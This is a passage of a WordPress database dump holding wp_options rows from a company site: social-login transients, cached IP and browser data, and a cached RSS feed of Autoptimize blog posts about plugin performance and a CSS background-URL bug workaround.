INSERT INTO `wp_options` VALUES (606519, '_site_transient_timeout_n_nextend5883af24629d22.25946186', '1485028660', 'no'); 
INSERT INTO `wp_options` VALUES (606520, '_site_transient_n_nextend5883af24629d22.25946186', '1', 'no'); 
INSERT INTO `wp_options` VALUES (606521, '_site_transient_timeout_nextend5883af24629d22.25946186_google_r', '1485028660', 'no'); 
INSERT INTO `wp_options` VALUES (606522, '_site_transient_nextend5883af24629d22.25946186_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (606625, '_site_transient_timeout_n_nextend588445ad949fe9.48548885', '1485067197', 'no'); 
INSERT INTO `wp_options` VALUES (606626, '_site_transient_n_nextend588445ad949fe9.48548885', '1', 'no'); 
INSERT INTO `wp_options` VALUES (606627, '_site_transient_timeout_nextend588445ad949fe9.48548885_google_r', '1485067197', 'no'); 
INSERT INTO `wp_options` VALUES (606628, '_site_transient_nextend588445ad949fe9.48548885_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (606710, '_site_transient_timeout_n_nextend5884a1ef62a519.41197464', '1485090815', 'no'); 
INSERT INTO `wp_options` VALUES (606711, '_site_transient_n_nextend5884a1ef62a519.41197464', '1', 'no'); 
INSERT INTO `wp_options` VALUES (606712, '_site_transient_timeout_nextend5884a1ef62a519.41197464_fb_state', '1485090815', 'no'); 
INSERT INTO `wp_options` VALUES (606713, '_site_transient_nextend5884a1ef62a519.41197464_fb_state', '780fda7f0760f62617c44f34c0d7a007', 'no'); 
INSERT INTO `wp_options` VALUES (606714, '_site_transient_timeout_nextend5884a1ef62a519.41197464_fb_r', '1485090815', 'no'); 
INSERT INTO `wp_options` VALUES (606715, '_site_transient_nextend5884a1ef62a519.41197464_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (607021, '_site_transient_timeout_n_nextend5885ff10bc24c3.94276169', '1485180192', 'no'); 
INSERT INTO `wp_options` VALUES (607022, '_site_transient_n_nextend5885ff10bc24c3.94276169', '1', 'no'); 
INSERT INTO `wp_options` VALUES (607023, '_site_transient_timeout_nextend5885ff10bc24c3.94276169_google_r', '1485180192', 'no'); 
INSERT INTO `wp_options` VALUES (607024, '_site_transient_nextend5885ff10bc24c3.94276169_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (607079, '_site_transient_timeout_n_nextend588643110076a4.02006877', '1485197601', 'no'); 
INSERT INTO `wp_options` VALUES (607080, '_site_transient_n_nextend588643110076a4.02006877', '1', 'no'); 
INSERT INTO `wp_options` VALUES (607081, '_site_transient_timeout_nextend588643110076a4.02006877_fb_state', '1485197601', 'no'); 
INSERT INTO `wp_options` VALUES (607082, '_site_transient_nextend588643110076a4.02006877_fb_state', '288c1e5101e8dedc31ea3a1636879301', 'no'); 
INSERT INTO `wp_options` VALUES (607083, '_site_transient_timeout_nextend588643110076a4.02006877_fb_r', '1485197601', 'no'); 
INSERT INTO `wp_options` VALUES (607084, '_site_transient_nextend588643110076a4.02006877_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (607085, '_site_transient_timeout_nextend588643110076a4.02006877_google_r', '1485197610', 'no'); 
INSERT INTO `wp_options` VALUES (607086, '_site_transient_nextend588643110076a4.02006877_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (607189, '_site_transient_timeout_n_nextend58866f9cdba615.57836481', '1485209004', 'no'); 
INSERT INTO `wp_options` VALUES (607190, '_site_transient_n_nextend58866f9cdba615.57836481', '1', 'no'); 
INSERT INTO `wp_options` VALUES (607191, '_site_transient_timeout_nextend58866f9cdba615.57836481_fb_state', '1485209004', 'no'); 
INSERT INTO `wp_options` VALUES (607192, '_site_transient_nextend58866f9cdba615.57836481_fb_state', 'b1f84fbbf6840512fc948185de6e2d5a', 'no'); 
INSERT INTO `wp_options` VALUES (607193, '_site_transient_timeout_nextend58866f9cdba615.57836481_fb_r', '1485209005', 'no'); 
INSERT INTO `wp_options` VALUES (607194, '_site_transient_nextend58866f9cdba615.57836481_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (607273, '_site_transient_timeout_n_nextend5886ca7a69d9a2.96493231', '1485232266', 'no'); 
INSERT INTO `wp_options` VALUES (607274, '_site_transient_n_nextend5886ca7a69d9a2.96493231', '1', 'no'); 
INSERT INTO `wp_options` VALUES (607275, '_site_transient_timeout_nextend5886ca7a69d9a2.96493231_fb_state', '1485232266', 'no'); 
INSERT INTO `wp_options` VALUES (607276, '_site_transient_nextend5886ca7a69d9a2.96493231_fb_state', '54d946fc5926bbd0621ff2b208e7460c', 'no'); 
INSERT INTO `wp_options` VALUES (607277, '_site_transient_timeout_nextend5886ca7a69d9a2.96493231_fb_r', '1485232266', 'no'); 
INSERT INTO `wp_options` VALUES (607278, '_site_transient_nextend5886ca7a69d9a2.96493231_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (607338, '_site_transient_timeout_n_nextend588728dbb784a1.09861739', '1485256427', 'no'); 
INSERT INTO `wp_options` VALUES (607339, '_site_transient_n_nextend588728dbb784a1.09861739', '1', 'no'); 
INSERT INTO `wp_options` VALUES (607340, '_site_transient_timeout_nextend588728dbb784a1.09861739_google_r', '1485256427', 'no'); 
INSERT INTO `wp_options` VALUES (607341, '_site_transient_nextend588728dbb784a1.09861739_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (607344, '_site_transient_timeout_n_nextend58872fdfa1a183.39973385', '1485258223', 'no'); 
INSERT INTO `wp_options` VALUES (607345, '_site_transient_n_nextend58872fdfa1a183.39973385', '1', 'no'); 
INSERT INTO `wp_options` VALUES (607346, '_site_transient_timeout_nextend58872fdfa1a183.39973385_fb_state', '1485258223', 'no'); 
INSERT INTO `wp_options` VALUES (607347, '_site_transient_nextend58872fdfa1a183.39973385_fb_state', '23a188121dc7aaaf11375cae852ffe3f', 'no'); 
INSERT INTO `wp_options` VALUES (607348, '_site_transient_timeout_nextend58872fdfa1a183.39973385_fb_r', '1485258223', 'no'); 
INSERT INTO `wp_options` VALUES (607349, '_site_transient_nextend58872fdfa1a183.39973385_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (607350, '_site_transient_timeout_n_nextend58873036f02c21.10827414', '1485258310', 'no'); 
INSERT INTO `wp_options` VALUES (607351, '_site_transient_n_nextend58873036f02c21.10827414', '1', 'no'); 
INSERT INTO `wp_options` VALUES (607352, '_site_transient_timeout_nextend58873036f02c21.10827414_fb_state', '1485258311', 'no'); 
INSERT INTO `wp_options` VALUES (607353, '_site_transient_nextend58873036f02c21.10827414_fb_state', '18ce8a93d7324099416bf6357b7c0bea', 'no'); 
INSERT INTO `wp_options` VALUES (607354, '_site_transient_timeout_nextend58873036f02c21.10827414_fb_r', '1485258311', 'no'); 
INSERT INTO `wp_options` VALUES (607355, '_site_transient_nextend58873036f02c21.10827414_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (607379, '_site_transient_timeout_n_nextend58877de360e526.44112021', '1485278195', 'no'); 
INSERT INTO `wp_options` VALUES (607380, '_site_transient_n_nextend58877de360e526.44112021', '1', 'no'); 
INSERT INTO `wp_options` VALUES (607381, '_site_transient_timeout_nextend58877de360e526.44112021_fb_state', '1485278195', 'no'); 
INSERT INTO `wp_options` VALUES (607382, '_site_transient_nextend58877de360e526.44112021_fb_state', 'd4ef7751d85e56381444224cfe79c2c6', 'no'); 
INSERT INTO `wp_options` VALUES (607383, '_site_transient_timeout_nextend58877de360e526.44112021_fb_r', '1485278195', 'no'); 
INSERT INTO `wp_options` VALUES (607384, '_site_transient_nextend58877de360e526.44112021_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (607386, '_transient_timeout_external_ip_address_10.246.21.53', '1485879902', 'no'); 
INSERT INTO `wp_options` VALUES (607387, '_transient_external_ip_address_10.246.21.53', '104.238.94.202', 'no'); 
INSERT INTO `wp_options` VALUES (607393, '_site_transient_timeout_browser_462e02c52a74cffe07f2af5b5402c114', '1485881871', 'no'); 
INSERT INTO `wp_options` VALUES (607394, '_site_transient_browser_462e02c52a74cffe07f2af5b5402c114', 'a:9:{s:8:"platform";s:7:"Windows";s:4:"name";s:7:"Firefox";s:7:"version";s:4:"50.0";s:10:"update_url";s:23:"http://www.firefox.com/";s:7:"img_src";s:50:"http://s.wordpress.org/images/browsers/firefox.png";s:11:"img_src_ssl";s:49:"https://wordpress.org/images/browsers/firefox.png";s:15:"current_version";s:2:"16";s:7:"upgrade";b:0;s:8:"insecure";b:0;}', 'no'); 
INSERT INTO `wp_options` VALUES (607428, '_site_transient_timeout_n_nextend5887b614189f31.44698840', '1485292580', 'no'); 
INSERT INTO `wp_options` VALUES (607429, '_site_transient_n_nextend5887b614189f31.44698840', '1', 'no'); 
INSERT INTO `wp_options` VALUES (607430, '_site_transient_timeout_nextend5887b614189f31.44698840_google_r', '1485292580', 'no'); 
INSERT INTO `wp_options` VALUES (607431, '_site_transient_nextend5887b614189f31.44698840_google_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (607451, '_transient_timeout_external_ip_address_10.191.194.132', '1485907512', 'no'); 
INSERT INTO `wp_options` VALUES (607452, '_transient_external_ip_address_10.191.194.132', '104.238.94.202', 'no'); 
INSERT INTO `wp_options` VALUES (607460, '_site_transient_timeout_n_nextend58880c924da325.59538373', '1485314722', 'no'); 
INSERT INTO `wp_options` VALUES (607461, '_site_transient_n_nextend58880c924da325.59538373', '1', 'no'); 
INSERT INTO `wp_options` VALUES (607462, '_site_transient_timeout_nextend58880c924da325.59538373_fb_state', '1485314722', 'no'); 
INSERT INTO `wp_options` VALUES (607463, '_site_transient_nextend58880c924da325.59538373_fb_state', '101c5e9c9f0a3db559b1d87af2ec632b', 'no'); 
INSERT INTO `wp_options` VALUES (607464, '_site_transient_timeout_nextend58880c924da325.59538373_fb_r', '1485314722', 'no'); 
INSERT INTO `wp_options` VALUES (607465, '_site_transient_nextend58880c924da325.59538373_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (607493, '_site_transient_timeout_n_nextend5888691c5df951.18116527', '1485338412', 'no'); 
INSERT INTO `wp_options` VALUES (607494, '_site_transient_n_nextend5888691c5df951.18116527', '1', 'no'); 
INSERT INTO `wp_options` VALUES (607496, '_site_transient_timeout_n_nextend588871ff3fa1d4.83003766', '1485340687', 'no'); 
INSERT INTO `wp_options` VALUES (607497, '_site_transient_n_nextend588871ff3fa1d4.83003766', '1', 'no'); 
INSERT INTO `wp_options` VALUES (607498, '_site_transient_timeout_nextend588871ff3fa1d4.83003766_fb_state', '1485340687', 'no'); 
INSERT INTO `wp_options` VALUES (607499, '_site_transient_nextend588871ff3fa1d4.83003766_fb_state', 'c2a213834a1432cba58d67dbca7ad3f8', 'no'); 
INSERT INTO `wp_options` VALUES (607500, '_site_transient_timeout_nextend588871ff3fa1d4.83003766_fb_r', '1485340687', 'no'); 
INSERT INTO `wp_options` VALUES (607501, '_site_transient_nextend588871ff3fa1d4.83003766_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (607502, '_site_transient_timeout_nextend588871ff3fa1d4.83003766_google_r', '1485340689', 'no'); 
INSERT INTO `wp_options` VALUES (607503, '_site_transient_nextend588871ff3fa1d4.83003766_google_r', '', 'no'); 
INSERT INTO `wp_options` VALUES (607506, '_site_transient_timeout_n_nextend5888767a10d898.50010235', '1485341834', 'no'); 
INSERT INTO `wp_options` VALUES (607507, '_site_transient_n_nextend5888767a10d898.50010235', '1', 'no'); 
INSERT INTO `wp_options` VALUES (607508, '_site_transient_timeout_nextend5888767a10d898.50010235_fb_state', '1485341834', 'no'); 
INSERT INTO `wp_options` VALUES (607509, '_site_transient_nextend5888767a10d898.50010235_fb_state', 'a926edcd5d7320e8ffab324b9bbf200f', 'no'); 
INSERT INTO `wp_options` VALUES (607510, '_site_transient_timeout_nextend5888767a10d898.50010235_fb_r', '1485341834', 'no'); 
INSERT INTO `wp_options` VALUES (607511, '_site_transient_nextend5888767a10d898.50010235_fb_r', 'https://www.miller-stephenson.com/my-account/', 'no'); 
INSERT INTO `wp_options` VALUES (607513, '_site_transient_timeout_n_nextend58887b0f48e816.03810233', '1485343007', 'no'); 
INSERT INTO `wp_options` VALUES (607514, '_site_transient_n_nextend58887b0f48e816.03810233', '1', 'no'); 
INSERT INTO `wp_options` VALUES (607515, '_site_transient_timeout_nextend58887b0f48e816.03810233_fb_state', '1485343007', 'no'); 
INSERT INTO `wp_options` VALUES (607516, '_site_transient_nextend58887b0f48e816.03810233_fb_state', 'e9228402f062941d7582b11fd016acd5', 'no'); 
INSERT INTO `wp_options` VALUES (607517, '_site_transient_timeout_nextend58887b0f48e816.03810233_fb_r', '1485343007', 'no'); 
INSERT INTO `wp_options` VALUES (607518, '_site_transient_nextend58887b0f48e816.03810233_fb_r', 'https://www.miller-stephenson.com', 'no'); 
INSERT INTO `wp_options` VALUES (607542, '_transient_timeout_ewww_image_optimizer_images_reoptimized', '1485356007', 'no'); 
INSERT INTO `wp_options` VALUES (607543, '_transient_ewww_image_optimizer_images_reoptimized', 'zero', 'no'); 
INSERT INTO `wp_options` VALUES (607578, '_transient_timeout_autoptimize_banner', '1485439655', 'no'); 
INSERT INTO `wp_options` VALUES (607579, '_transient_autoptimize_banner', '<li>Render-blocking CSS? Look at <br /><a href="https://www.youtube.com/embed/S5sjZRWsgrM?rel=0&amp;cc_load_policy=1&amp;autoplay=1" target="_blank">this howto-video</a> for the solution!</li>\n', 'no'); 
INSERT INTO `wp_options` VALUES (607580, '_transient_timeout_feed_760b3218a3724706ad0e8ff9b09019ce', '1485396455', 'no'); 
INSERT INTO `wp_options` VALUES (607581, '_transient_feed_760b3218a3724706ad0e8ff9b09019ce', 'a:4:{s:5:"child";a:1:{s:0:"";a:1:{s:3:"rss";a:1:{i:0;a:6:{s:4:"data";s:3:"\n\n\n";s:7:"attribs";a:1:{s:0:"";a:1:{s:7:"version";s:3:"2.0";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:1:{s:0:"";a:1:{s:7:"channel";a:1:{i:0;a:6:{s:4:"data";s:49:"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n		\n		\n		\n		\n		\n		\n		\n		\n		\n	";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:4:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:41:"autoptimize – Frank Goossens&#039; blog";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:21:"http://blog.futtta.be";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:30:"(futtta\'s Twitterless twaddle)";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:13:"lastBuildDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 18 Jan 2017 13:37:03 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"language";a:1:{i:0;a:5:{s:4:"data";s:5:"en-US";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:9:"generator";a:1:{i:0;a:5:{s:4:"data";s:30:"https://wordpress.org/?v=4.7.1";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"item";a:10:{i:0;a:6:{s:4:"data";s:51:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:6:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:37:"How to make Autoptimize (even) faster";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:65:"http://feedproxy.google.com/~r/futtta_autoptimize/~3/nw4MFxsm8Fc/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:78:"http://blog.futtta.be/2017/01/18/how-to-make-autoptimize-even-faster/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 18 Jan 2017 13:37:03 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:4:{i:0;a:5:{s:4:"data";s:11:"autoptimize";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:7:"lang:en";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:7:"support";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:15:"tips and tricks";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:30:"http://blog.futtta.be/?p=10454";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:370:"Less blogposts here lately, mostly because I&#8217;m doing custom Autoptimize-development for a partner (more on that later) and because I get a lot of support-questions on the wordpress.org support forums (with approx. between 1500-2000 downloads/ weekday that is to be expected). One of the more interesting questions I got there was about Autoptimize being slow [...]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:3127:"<p>Less blogposts here lately, mostly because I&#8217;m doing custom Autoptimize-development for a partner (more on that later) and because I get a lot of support-questions on the wordpress.org support forums (with approx. between 1500-2000 downloads/ weekday that is to be expected). One of the more interesting questions I got there was about <a href="https://wordpress.org/support/topic/longer-load-times-when-js-enabled/">Autoptimize being slow when JS optimization was active and what would be the cause of that</a>. The reply is of interest for a larger audience and is equally valid for CSS optimization;</p>\n<blockquote><p>Typically the majority of time spent in Autoptimize is mainly in the actual minification of code that is not minified yet (purely based on filename; if the filename ends in .min.js or -min.js).</p>\n<p>So generally speaking, the way to avoid this is;<br />\n1. have a <strong>page cache</strong> to avoid requests triggering autoptimize (as in that case the cached HTML will have links to cached CSS/JS in it)<br />\n2. for uncached pages; <strong>make sure AO can re-use previously cached CSS/ JS</strong> (from another page), in which case no minification needs to be done (for that you will almost always want to <strong>NOT aggregate inline JS</strong>, as this almost always busts the cache)<br />\n3. for uncached CSS/ JS; make sure any minified file is recognizable as such in <strong>the filename (e.g. .min.css -min.js)</strong>, this can lighten the minification-load considerably (I’ll add a filter in the next version of AO so you can tell AO a file is minified even if it does not have that in the name).</p>\n<p>So based on this, some tips;<br />\n* make sure you’re not aggregating inline JS<br />\n* for your own code (CSS/ JS); make sure it is minified and that the filename confirms this. if you can convince the theme’s developer to do so, all the better (esp. the already minified but big wp-content/themes/bridge/js/plugins.js is a waste of precious resources)<br />\n* you could try switching to the legacy minifiers (see <a href="https://wordpress.org/plugins/autoptimize/faq/">FAQ</a>) to see if this improves performance<br />\n* you can also check if excluding some un-minified files from minification helps performance (e.g. that bridge/js/plugins.js)</p></blockquote>\n<div class=\'yarpp-related-rss\'>\n<p>Possibly related twitterless twaddle:<ul>\n<li><a href="http://blog.futtta.be/2016/04/14/reviewing-bad-reviews-when-in-a-bad-mood/" rel="bookmark" title="Reviewing bad reviews when in a bad mood">Reviewing bad reviews when in a bad mood </a></li>\n<li><a href="http://blog.futtta.be/2014/08/18/when-should-you-trycatch-javascript/" rel="bookmark" title="(When) should you Try/Catch Javascript?">(When) should you Try/Catch Javascript? </a></li>\n<li><a href="http://blog.futtta.be/2015/07/21/want-to-beta-test-autoptimize-power-ups/" rel="bookmark" title="Want to beta-test Autoptimize power-ups?">Want to beta-test Autoptimize power-ups? </a></li>\n</ul></p>\n</div>\n<img src="http://feeds.feedburner.com/~r/futtta_autoptimize/~4/nw4MFxsm8Fc" height="1" width="1" alt=""/>";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:36:"http://wellformedweb.org/CommentAPI/";a:1:{s:10:"commentRss";a:1:{i:0;a:5:{s:4:"data";s:74:"http://blog.futtta.be/2017/01/18/how-to-make-autoptimize-even-faster/feed/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:38:"http://purl.org/rss/1.0/modules/slash/";a:1:{s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:1:"2";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:42:"http://rssnamespace.org/feedburner/ext/1.0";a:1:{s:8:"origLink";a:1:{i:0;a:5:{s:4:"data";s:69:"http://blog.futtta.be/2017/01/18/how-to-make-autoptimize-even-faster/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}}}i:1;a:6:{s:4:"data";s:60:"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n		\n		\n		\n\n		\n		\n				\n			\n		\n		";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";s:5:"child";a:6:{s:0:"";a:7:{s:5:"title";a:1:{i:0;a:5:{s:4:"data";s:58:"WordPress 4.7 custom background image bug &amp; workaround";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"link";a:1:{i:0;a:5:{s:4:"data";s:65:"http://feedproxy.google.com/~r/futtta_autoptimize/~3/_HuuQwRh2Bo/";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"comments";a:1:{i:0;a:5:{s:4:"data";s:95:"http://blog.futtta.be/2016/12/07/wordpress-4-7-custom-background-image-bug-workaround/#comments";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:7:"pubDate";a:1:{i:0;a:5:{s:4:"data";s:31:"Wed, 07 Dec 2016 15:46:40 +0000";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:8:"category";a:7:{i:0;a:5:{s:4:"data";s:11:"autoptimize";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:1;a:5:{s:4:"data";s:7:"lang:en";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:2;a:5:{s:4:"data";s:9:"wordpress";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:3;a:5:{s:4:"data";s:3:"bug";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:4;a:5:{s:4:"data";s:17:"custom background";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:5;a:5:{s:4:"data";s:13:"wordpress 4.7";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}i:6;a:5:{s:4:"data";s:10:"workaround";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:4:"guid";a:1:{i:0;a:5:{s:4:"data";s:30:"http://blog.futtta.be/?p=10437";s:7:"attribs";a:1:{s:0:"";a:1:{s:11:"isPermaLink";s:5:"false";}}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}s:11:"description";a:1:{i:0;a:5:{s:4:"data";s:335:"If you encountered this bug but are not using Autoptimize, leave a comment below or contact me here. Your info can help understand if the regression has an impact outside of Autoptimize as well! Gotta love Sarah, but there&#8217;s a small bug in Vaughan&#8217;s (WordPress 4.7) that breaks (part of the CSS) when Autoptimized. If [...]";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:32:"http://purl.org/dc/elements/1.1/";a:1:{s:7:"creator";a:1:{i:0;a:5:{s:4:"data";s:5:"frank";s:7:"attribs";a:0:{}s:8:"xml_base";s:0:"";s:17:"xml_base_explicit";b:0;s:8:"xml_lang";s:0:"";}}}s:40:"http://purl.org/rss/1.0/modules/content/";a:1:{s:7:"encoded";a:1:{i:0;a:5:{s:4:"data";s:2911:"<p>If you encountered this bug but are <strong>not using Autoptimize</strong>, leave a comment below or <a href="/contact/">contact me here</a>. Your info can help understand if the regression has an impact outside of Autoptimize as well!</p>\n<hr />\n<p>Gotta love Sarah, <a href="https://wordpress.org/support/topic/incompatibility-with-wp-4-7-aggregate-inline-css/">but there&#8217;s a small bug in Vaughan&#8217;s (WordPress 4.7) that breaks (part of the CSS) when Autoptimized</a>. If you have a theme that supports custom backgrounds (e.g. TwentySixteen) and you set that custom background in the Customizer, the URL ends up escaped (well, they wp_json_encode() it actually) like this;</p>\n<pre class="brush: css; title: ; notranslate">\nbody{background-image: url(&quot;http:\\/\\/localhost\\/wordpress\\/wp-content\\/uploads\\/layerslider\\/Full-width-demo-slider\\/left.png&quot;);}\n</pre>\n<p>Which results in the Autoptimized CSS for the background-image being broken because the URL is not recognized as such. The <a href="https://core.trac.wordpress.org/ticket/39145#comment:1">bug has been confirmed already</a> and <a href="https://core.trac.wordpress.org/attachment/ticket/39145/39145.diff">the fix</a> should land in WordPress 4.7.1.</p>\n<p>If you&#8217;re impacted and can&#8217;t wait for 4.7.1 to be released, there are 2 workarounds:<br />\n1. simple: disable the &#8220;Aggregate inline CSS&#8221;-option<br />\n2. geeky: use this code snippet to fix the URL before AO has a change to misinterpret it;</p>\n<pre class="brush: php; title: ; notranslate">add_filter(\'autoptimize_filter_html_before_minify\',\'fix_encoded_urls\');\nfunction fix_encoded_urls($htmlIn) {\n	if ( strpos($htmlIn,&quot;body.custom-background&quot;) !== false ) {\n		preg_match_all(&quot;#background-image:\\s?url\\(?[\\&quot;|\']((http(s)?)?:\\\\\\/\\\\\\/.*)[\\&quot;|\']\\)?#&quot;,$htmlIn,$badUrls);\n	  	if ($badUrls) {\n			foreach ($badUrls[1] as $badUrl) {\n				$htmlIn = str_replace($badUrl, stripslashes($badUrl), $htmlIn);\n			}\n		}\n	}\n  	return $htmlIn;\n}</pre>\n<div class=\'yarpp-related-rss\'>\n<p>Possibly related twitterless twaddle:<ul>\n<li><a href="http://blog.futtta.be/2012/12/20/2012-ffwd-high-performance-twenty-twelve-child-theme/" rel="bookmark" title="2012.FFWD; high performance Twenty Twelve child theme">2012.FFWD; high performance Twenty Twelve child theme </a></li>\n<li><a href="http://blog.futtta.be/2013/11/08/wp-default-themes-2010-2014-performance-going-down/" rel="bookmark" title="WP default themes 2010-2014: performance going down">WP default themes 2010-2014: performance going down </a></li>\n<li><a href="http://blog.futtta.be/2014/02/13/should-you-inline-or-defer-blocking-css/" rel="bookmark" title="Should you inline or defer blocking CSS?">Should you inline or defer blocking CSS? </a></li>\n</ul></p>\n</div>\n<img src="http://feeds.feedburner.com/~r/futtta_autoptimize/~4/_HuuQwRh2Bo" height="1" width="1" 